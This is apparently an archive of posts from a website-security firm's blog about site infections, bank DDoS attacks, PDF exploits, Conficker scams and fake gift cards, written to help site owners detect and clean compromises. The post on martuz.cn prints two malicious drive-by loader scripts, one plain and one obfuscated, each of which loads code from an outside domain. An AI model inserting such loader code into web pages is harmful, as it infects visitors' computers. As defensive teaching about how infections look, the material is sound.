Category Archives: Current Event Attacks

“Why would hackers want my site?”

This is a question we’re asked all the time.

As I read this article I thought it was one good answer to why hackers want your site:

http://www.darkreading.com/threat-intelligence/167901121/security/attacks-breaches/240145920/bank-ddos-attacks-employ-web-servers-as-weapons.html
broken-piggy-bank

One comment I have about the above article. It uses the term web servers when they should be saying web sites.

This article provides more insight into the attacks.

Bank DDoS Attacks Using Compromised Web Servers as Bots

When you read the second article, notice the username and password used on the website: admin/admin. We see this frequently.

We have cleaned thousands of websites that are being used in these DDoS attacks on banks. The cybercriminals find a point of entry, exploit it, upload their script files and then coordinate the attack from a remote location.

First line of defense is a strong password.

The next line of defense is to keep your software; WordPress, Joomla, whatever, up-to-date at all times.

If you have any thoughts or comments about this, please share.

Thank you.

l_backuptoster.php still showing

Leave a reply

Over the past few weeks we’ve cleaned a number of websites that were infected with l_backuptoster.php and while it’s been around awhile, we thought we would share our experience. This infection isn’t so much about website security as it is about computer security, but it does eventually affect your website security as well – which is why we’re involved.

For those of you unfamiliar with this little gem, it’s used by hackers to send SPAM. It is uploaded to the website via FTP – which means that the FTP password has been compromised, or worse, the hosting account password has been compromised.

In the most recent instances of websites infected with the l_backuptoster.php file, a new FTP account was created on the hosting account and that was used to upload the files. The files is uploaded with 2 other files: body1.txt and body.txt, used, then deleted until the next time the hacker wants to send SPAM.

Here is what you might see in your FTP logs:

Tue Dec 20 06:32:41 2011 0 xx.xx.xx.xxx 320 /home/path/public_html/body1.txt b _ i r candy@yourdomain ftp 1 * c
Tue Dec 20 06:32:42 2011 0 xx.xx.xx.xxx 292 /home/path/public_html/body.txt b _ i r candy@yourdomain ftp 1 * c
Tue Dec 20 06:32:42 2011 0 xx.xx.xx.xxx 8160 /home/path/public_html/l_backuptoster.php b _ i r candy@yourdomain ftp 1 * c

The xx.xx.xx.xxx would actually be where this traffic is originating. The number after is the file size, the path and the FTP account used.

You see that first the body1.txt file, with a size of 320, was uploaded to the folder shown, followed by body.txt with a size of 292 and finally the l_backuptoster.php file with a size of 8160.

If you’ve been infected with this, and you have your Raw Access Logs activated, you will probably also see entries like these in your access logs:

xx.xx.xx.xxx – - [12/Jan/2012:12:34:58 -0700] “GET /l_backuptoster.php?id=4550&ipAddr=xx.xx.xx.xxx&serv_name=www.yourdomain HTTP/1.1″ 200 205 “-” “-”
xx.xx.xx.xxx – - [12/Jan/2012:12:34:58 -0700] “GET /l_backuptoster.php?id=4554&ipAddr=xx.xx.xx.xxx&serv_name=www.yourdomain HTTP/1.1″ 200 205 “-” “-”

Again, the xx.xx.xx.xxx would actually show the originating IP address. In our work, we track down this IP address and report it to the proper people as this is an indication that the originating IP address is being used in a suspicious manner.

In the above log file entries the ipAddr matches the first IP address and the serv_name parameter would be your, or the infected URL.

You will probably see hundreds of these lines if your website is being used with the l_backuptoster.php file.

What we found in each case of a website infected with l_backuptoster.php was that the FTP account used to upload these files was not created by the hosting account owner. The only way this could have been achieved was if the hosting account password had been compromised.

If this is true, then the hackers are no longer just stealing the FTP login credentials, but their keyboard loggers are also recording all logins and the hackers are very interested in infecting websites so why not create their own FTP account.

As stated earlier, after the activity in the access logs, we found that the 3 files uploaded were deleted so there was no trace. The hackers would simply upload the files again at a later time, use them and delete them.

Without constant watching of the log files, we would not have seen this.

If you have been a victim of the l_backuptoster.php website infection, here’s what you should do:

Change your hosting account password
Check your hosting account for unused or unauthorized FTP accounts and delete any that you aren’t familiar with
Create new passwords for remaining FTP accounts
Perform a full system virus scan with either Avast! or AVG anti-virus and use Malwarebytes as a secondary scanner. If you’re using a Mac try BitDefender
Check your log files on regular basis. Download them to your computer and search for ‘l_backuptoster.php’

One point to remember, do not ever have your browser save your hosting account password or the any passwords. We have copies of the viruses hackers use to steal passwords and they work extremely well on browser saved passwords!

If you’ve been infected by this and have more to add, please leave a comment. If you need help in cleaning this up and getting everything “locked down”, please email me at traef@wewatchyourwebsite.com or call at (847)728-0214.

Thank you.

If you found this useful, Tweet about us, like us on Facebook or follow us on Google+.

New Website Infection Method

Leave a reply

Working with a website owner recently, we came across a new method of delivering infectious code (drive-by downloads) – at least it’s a method we’ve never seen before.

The scenario: Website owner gets the email from Google telling them their website is serving up malscripts to visitors and adds “This website can harm your computer” to all their SERPs. The website owner can’t find the malscript anywhere.

We scan their site and find nothing. Our scanning spiders their site, all links and even spiders the sites they link to.

Someone from another vendor says they found malware on a webpage that we didn’t even see. I start screaming “Why didn’t we find this page?” We try to manually download the page and we get a 404 error – page not found.

Turns out, the page didn’t even exist. We try to access the non-existent webpage with a sandboxed browser (sandboxed means it’s a system that can’t be infected due to all the security measures we’ve taken. It also records any attempted file changes, registry changes, etc.).

Bam! We see in the 404 error page that there’s some redirect code in there trying to access martuz.cn. Interesting.

We look at the address bar in our browser and see that it didn’t redirect to a custom 404 error page, it still shows the URL we typed in with the john_doe.html page at the end. We know from our scan that this client is running their website on an Apache 2.0 server.

Our research showed that in the Apache installation folder under a sub-folder of “error”, the HTTP_NOT_FOUND file had been modified and the malscript added.

Which begs the question, why would a cybercriminal go through all that trouble to only deliver the martuz.cn malscript to people who type in a non-existent webpage?

Not sure on that one.

We also found these files had been added to the default directory on the webserver:

bad_gateway.html
bad_request.html
forbidden.html
internal_server_error.html
method_not_allowed.html
not_acceptable.html
not_found.html
not_implemented.html
precondition_failed.html
proxy_authentication_required.html
request-uri_too_long.html
unauthorized.html
unsupported_media_type.html

Each of these pages looked like the default Apache error pages but with the martuz.cn malscript inserted between the closing HEAD tag and the opening BODY tag.

We found that Apache uses one of 4 options when handling error responses:

output a simple hardcoded error message
output a customized message
redirect to a local URL-path to handle the problem/error
redirect to an external URL to handle the problem/error

It didn’t appear to be redirecting as the URL in the address bar was still what we had entered. So we eliminated options 3 & 4.

At first when we saw the malscript only being delivered with 404 responses, we thought that maybe there must be some line in the httpd.conf file like:

ErrorDocument 404 /404.html

But there was no such entry in the httpd.conf file. It was definitely the default Apache error page with the martuz malscript inserted.

Further investigation found our theory was correct.

Lesson: When trying to find all the infectious pages on your site, don’t overlook the non-existent webpages as well. In this particular case, those were the only files serving infectious code.

How To Find martuz.cn in Websites

9 Replies

After our post earlier today about how martuz.cn is the new domain for gumblar infections, we’ve received hundreds of emails from people (I guess too embarassed to post their question in an open forum), asking how to find martuz.cn in websites.

We’ll use a utility program called wget. Wget allows you to download the “raw” webpage from a site. It’s used quite heavily in the Linux world, but there is also a version for Windows users.

You can download wget from here: http://gnuwin32.sourceforge.net/packages/wget.htm

I recommend you select the Complete Package, except sources.

Download it, install it – you can just accept all of the defaults.

Now open a command prompt (Start->Run->cmd->OK).

Change directories like this: cd \”Program Files\GnuWin32\bin” <enter>

Let me explain a little about the options we’ll use with wget.

Sometimes these infectious malscripts like martuz.cn will only show themselves when viewed with a specific browser. In the recent days, martuz.cn won’t activate if you visit one of their infectious websites with Google Chrome as your browser. To be sure, we’ll set our user agent (which is what gets checked for your current browser) to Internet Explorer on a Windows XP computer.

Other times infectious malscripts like martuz.cn or certain variations of gumblar.cn will only try to infect a visitor’s PC if the visitor is coming to the infectious site from a Google search. In that case we would need to set “referer” to Google’s home page.

Here’s how we do it with wget. You would enter this in your command prompt:

wget –user-agent=’Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)’ –referer=http://www.google.com http://www.yoursitehere.com

Obviously you would change the http://www.yoursitehere.com with your webpage. For instance, if your website is http://www.joesbarandgrill.com you would simply use the above command but with http://www.joesbarandgrill.com in place of http://www.yoursitehere.com

This will download your homepage into the current directory on your PC.

If your site has already been indexed by Google and found to have infectious webpages, you can use this Google search to find out which pages Google has found malscripts on.

site:yoursitehere.com

The Search Engine Results Pages (SERPs) will show you each page from your site and any pages that Google thinks has malscripts on them will display their warning “This site may harm your computer”.

You should use wget for each page that Google lists as hosting malscripts by providing the complete URL in the wget command line.

For instance, if you have a webpage contactus.html and it’s listed in Google SERPs as hosting malscripts, then you would use this wget command:

wget –user-agent=’Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)’ –referer=http://www.google.com http://www.yoursitehere.com/contactus.html

That will download contactus.html into your current directory and you would scan that for any malscripts.

Now that you have downloaded your webpages into your current directory, you can begin the process of searching through the files.

While at your command prompt type in:

edit index.html

Then use search->find and type in the word: mart

The reason you don’t search for martuz.cn is that the cybercriminals know that would make it too easy for you to find. Their script (one of them we’ve found) looks like this:

var a="Script Engine",b="Version()+",j="",u=navigator.userAgent; if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){ zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;"); document.w rite("<script src=//mar tu"+"z.cn/vid/?id="+j+"><\/script>");}

So you can see that if you were to scan for martuz, you’d never find it because their malscript uses string concatentation to “build” martuz.cn (martu + z.cn)

Here’s another martuz script we found:

(f u n c t i o n(){var G33z1='%';var KlKj='va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-26-26(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d';var m8nw=KlKj.replace(/-/g,G33z1);e val(unescape(m8nw))})();

If you look at this second malscript you won’t find martuz or mart or any other text even close to the first malscript. If you find any script like this in your downloaded webpages, more than likely your site is serving infectious code. This is an example of the steps cybercriminals will go through to obfuscate their malscripts.

You’ll have to scan through each file on your website in order to see if you have any martuz.cn infections. If you do find them, you should scan your PC for any viruses with AVG, Avast or Malwarebytes, clean it, change the FTP password to your site and upload your last known, good backup. You do have a backup right?

We are working on a video to show you how to move away from FTP and use SSH/SCP instead, but we’re not quite ready with it yet.

If you subscribe to this blog, you’ll get an update when it’s ready.

Thank you. We hope you found this useful. If you have any questions, please email us or post your comments below.

Adobe Acrobat Hit Again

Leave a reply

It’s true.

Adobe Acrobat is vulnerable once again. This is getting ridiculous. They have enough money to buy up software companies but yet they can’t invest the time and money to harden their existing products?

They worked so hard to get everyone to use their software. It’s standard on computer installs now. Who doesn’t have Adobe Acrobat Reader on their computer?

With this latest “hole”, I’ve started looking for alternatives and I’ll let you know if and when I find one. But in retrospect, I’d rather stay with a company that is solidly locked into the software market and has a lot to lose if they don’t fix their vulnerabilities, than one that might be a fly-by-night company and leaves me standing out in the cold.

Many in the security community have even coined an acronym for this scenario – YAPE (Yet Another PDF Exploit). You know things are bad when the security community assigns an acronym to it.

Adobe is again recommending that you disable Javascript in Adobe Acrobat. If you followed my instructions last time, you still have Javascript disabled so you’re safe. If for some reason, you didn’t read my last warning about Adobe Acrobat here are the steps to follow:

To turn off Javascript follows these steps:

Launch Adobe Acrobat Reader
Select Edit -> Preferences
Select the Javascript category
Uncheck the “Enable Acrobat Javascript” option
Click “Ok”

It begs the question, “Why does anyone need Javascript in a reader for locked files anyway?” To me, it’s technology looking for a reason.

When Adobe first introduced the Javascript ability, I looked for a way to turn it off. I don’t need it. I don’t want something in my software that allows other people to control what I’m doing.

As of this writing, Adobe is working on a patch. All versions of Adobe Acrobat, on every platform; Mac, Linux and Windows are vulnerable.

I will keep you updated on this situation or you can follow it on Adobe’s website here:

http://www.adobe.com/support/security/

As always, I recommend you apply the patch as it becomes available as this exploit will allow an attacker to remotely execute commands on your computer and the exploit code is already available.

Our honeypots have not detected any new waves of infectious PDFs in the wild – yet. But sure as, well you know, they will be forth coming.

Please feel free to pass the link to this posting to your friends and family.

Don't Open That File!

Leave a reply

Yes, just when you thought it was safe to open Adobe Acrobat files (with a .pdf extension), it’s not.

Everyone who reads this should update their Adobe Acrobat Reader here: http://www.adobe.com/support/security/bulletins/apsb09-04.html

Hackers (or as some prefer – cybercriminals), have found a new way to use pdf’s to infect computers (CVE-2009-0927) http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927. By using a legitimate website, or websites, hackers can reach many more unsuspecting web users.

What the cybercriminals are doing is finding legitimate websites they can hack and replacing any pdf files with their infectious pdf’s. Anyone who opens that pdf, either on screen or by downloading it and then opening it, will be subjected to this exploit and could face infection.Some websites have various forms they use for reports, registrations or any of a number of uses.

Frequently the infected webpage is designed to open automatically when you visit the page. Rarely will the website owner know they have an infectious website. Often times the infectious website won’t actually contain the malicious code. The webpage will have a line of javascript that downloads the malicious code from some server in a land far far away.

I usually hear people saying, “I scanned my website with 5 different anti-virus programs and nothing was detected.”

While this doesn’t hurt, rarely will this action find the infected webpage because only the javascript code that “reaches” out to the far away server is on the webpage – and it’s heavily encrypted to avoid easy detection. The actual virus or other malicious code is located on their server and often it’s polymorphic – it changes it’s shape and size for each time it’s downloaded on a user’s PC. This “strategy” helps the infectious code in evading detection by most anti-virus programs.

Hacking of a legitimate website is nothing new in distributing malware as I’ve written about numerous times in other blog postings here.

Update your Adobe Acrobat Reader now!

Let’s be careful out there, huh?

Thank you.

Paul McCartney's Web Site Hacked – "Back in the USSR"

1 Reply

Yes it’s true. The rock n roll icon Paul McCartney had his website hacked. (This attack isn’t necessarily originating in Russia, but I couldn’t refuse the obvious opportunity.)

It’s amazing how certain hackings follow the news. It was just a couple days ago when I was watching the news on TV (yes that old, outdated media) and learned that Paul McCartney and Ringo Starr were going to get back together for a “reunion” tour.

The website hacking could have been purely coincidental, as the toolkit planted on his website – Luckysploit, has been used in many, many recent website malware distributions. It could be that the cybercriminals behind this exploit just happened to find this site vulnerable to their recent attack. I believe it’s irrelevant how or why, their timing was impeccable.

This is another example of social engineering used successfully to infect more computers.

Think of the millions of Beatle’s fans (my father-in-law is one of them – a fan not a virus victim) hearing about this reunion and flocking to Mr. McCartney’s website to find out where their concerts will be performed only to find out at the next anti-virus scan that they’ve been compromised by a bank login and password stealing virus.

The nerve of these hackers. Using something so “in the news” to lure millions of people to infectious websites that have been planted with malicious code, appearing to be legitimate websites, for the sole purpose of delivering a virus that is currently evading detection by many anti-virus programs.

Is there no shame?

This attack is being carried out by the Zeus botnet. Yes while everyone was watching out for Conficker, many forgot about the other botnets out there.

It’s easy to spot the infectious malware code in the “source” of the web page. All you have to do is look for something that’s impossible to read because it is encrypted and obfuscated to avoid easy detection. Luckily for us, we don’t look for specific infections while scanning websites. Our systems are based on any changes to a website. We pay close attention to changes that include specific keywords, but our alert system is based on any changes made to a website.

Once again the cybercriminals use a popular event to spread their malware. This particular infection will steal banking credentials which are then sold on the open black market. This is one of the cybercriminals profit centers. They have many.

Be careful when using the Internet, you never know if you’re getting more than you bargained for.

Other Beatle’s songs that come to mind with my sub-titles:

“Do You Want to Know a Secret” (about my malware)

“Don’t Ever Change” (my website)

“Don’t Let Me Down” (please click on this infectious link)

“Eight Days a Week” (and I’ll infect you every one of them)

“Everybody’s Got Something to Hide Except Me and My Monkey” (okay maybe my monkey has some malware to hide too)

“Fixing a Hole” (in your website)

“Free as a Bird” (free as in free malware)

“From Me to You” (more malware from me to you)

“Get Back” (to where you can get infected)

“Got To Get You Into My Life” (so I can hack you some more)

“Help!” (I need the services of WeWatchYourWebsite)

“I Am the Walrus” (I live Belarus) (okay you find something that goes with Walrus)

I could go on, but the Beatles wrote a lot of songs and I need to save server space.

Let’s be careful out there…

What Conficker was – and wasn't

Leave a reply

Well, the big April 1st “dooms day” has come and gone.

I’ll admit that even though we really didn’t think anything malicious was going to happen, we did add a Conficker scanner to The Box (our security appliance at www.ebasedsecurity.com) so we could scan our client’s systems.

Let me explain our thinking. We’ve been following Conficker all along the way. From the first strain to the most recent, we’ve been watching with our honeypots – collecting data and samples and determining what could happen. We’ve seen the changes, what it does and how it communicates with it’s “mother ship” waiting for it’s next set of instructions.

When news of Conficker hit mass media, (60 Minutes did a piece on it) our non-technical gut feeling was that the cybercriminals wouldn’t actually do anything malicious with their code. There was too much public awareness.

Keep in mind that if they had, they could have created some real havoc on the Internet. Some experts (my Dad’s definition of an expert is: an ex is a has been and a spirt is a drip under pressure) estimate that anywhere from 10 million to 100 million PCs are infected with Conficker.

If a cybercriminal or a group of cybercriminals have remote control of that many PCs and they decided to launch an attack against some main Internet servers, they could overload them with so much bogus traffic as to basically eliminate them from accessibility.

Now, if they attacked the main DNS servers on the Internet (the servers that convert domain names to IP addresses) could they slow down or shut-down the Internet? Possibly.

However, nothing happened.

Or did it?

What actually happened might be exactly what the cybercriminals wanted.

How many of you did Google searches for Conficker over the past week (the week before April 1)?

Many, many (our research showed that over 1.7 million ) people searched for “conficker scanner” or “conficker removal”, “remove conficker”, “find conficker” and numerous other terms.

Did you realize that many of the search results were offering solutions that actually infected your PC? Many of the websites that were displayed as a result of those search terms were created by the cybercriminals!

Could this have been the real intention of the cybercriminals? If so, this could be the biggest social engineering hack of all time. We examined many of these sites and found a number of them (64%) were selling Conficker scanners and removal tools. All of these “tools” we found were actually RATs (Remote Access Trojans) which actually provided the cybercriminals with remote control of the PC it was installed on.

And, “they” (the cybercriminals) got you to pay for it!

Are these guys geniuses or what?

Many of the sites that weren’t selling bogus removal tools tried to infect any PC that visited their site. These infected webpage sites used a variety of sneaky methods to infect PCs. One instance we found actually tried 17 different attacks on all the PCs visiting it’s infectious website.

If you’ve been following us, you know that legitimate websites serving malware are increasing. This coupled with infected websites serving malware makes the Internet a very dangerous place.

Fortunately for all of our clients with The Box, they don’t have to worry about things like this because The Box doesn’t allow downloads from non-whitelisted websites. What a concept.

That’s what Conficker was and what it wasn’t.

Anyone have comments? (comments that aren’t SPAM)

Bomb Threat SPAM

Leave a reply

Cybercriminals are using cleverly crafted SPAM messages to get you to click on a link that supposedly takes you to a Reuter’s video of bomb blasts in your area.

I say cleverly crafted because the email will change based on where your IP address is. For instance, I received one with a subject line of, “Are you and your friends okay?”.

When I clicked on the link (yes as part of my research), I saw a webpage that showed the Reuter’s logo with, “Powerful explosion burst in Chicago this morning”. There’s a graphic to see the video with text below that reads, “At least 12 people have been killed and more than 40 wounded in a bomb blast near market in Chicago. Authorities suggested that explosion was caused by “dirty” bomb. Police said the bomb was detonated from close by using electric cables.”

Scanning through our logs of SPAM for our clients using The Box, we’ve been able to see how the message refers to a different major nearby city depending on where the client receives their email.

The video will install some malware via a download. We’ve identified the trojan as a strain of Waled or Waledac depending on your AV.

Other subject lines we’ve seen are: “Take Care!”, “At least 18 killed in your city” (which is interesting as all the emails we’ve seen state that 12 have been killed), “I hope you are not in the city now”, “Bomb blast near you” and a host of others.

We’ve reported before on how clever cybercriminals are to use hype and fear as examples of social engineering to get people to want to click on their links. When clicked, systems become infected.

Cyber threats such as these will continue as long as they’re successful at hooking at least a few million people. Hackers are making good money through their craft and will not stop. Using extreme fear and directing visitors to infectious websites will always be a tactic they pull out every once in awhile. This will die down and then in another few months they’ll use some other alarmist strategy and infect some more computers.

That’s what they do.

Fake iTunes cards – next cybercriminal profit center

Leave a reply

What if you were offered a $200 iTunes card for less than $5?

How about for $2.60?

Would you buy it?

Apparently cybercriminals based in China have cracked the algorithm used by Apple to generate legitimate iTune cards. This along with their stolen credit card data has become yet another revenue stream for the cyber-criminals.

What’s really amazing is that you can’t even buy a $200 gift card from Apple. Their denominations are: $15, $25 and $50.

This story originally broke here: http://outdustry.com/2009/03/10/the-chinese-itunes-gift-voucher-trick/ and a little investigation on our part revealed some interesting sites.

We’ve seen some “middle men” insert themselves in this tangled web of deceit. They actually buy the numbers from the original cybercriminals and then resell them to people they know, thus creating a wholesale/distributor type of business. Talk about an affiliate program that pays big dollars!

Some people are offering cards on various auction type websites. (I’m not mentioning any names but one of them rhymes with prepay)

Please know that buying and using these cards is illegal. We’re posting this so you know NOT to buy them and think they’re legit – they’re not.

What will they think of next?

I don’t know, but I’m sure we’ll see it soon.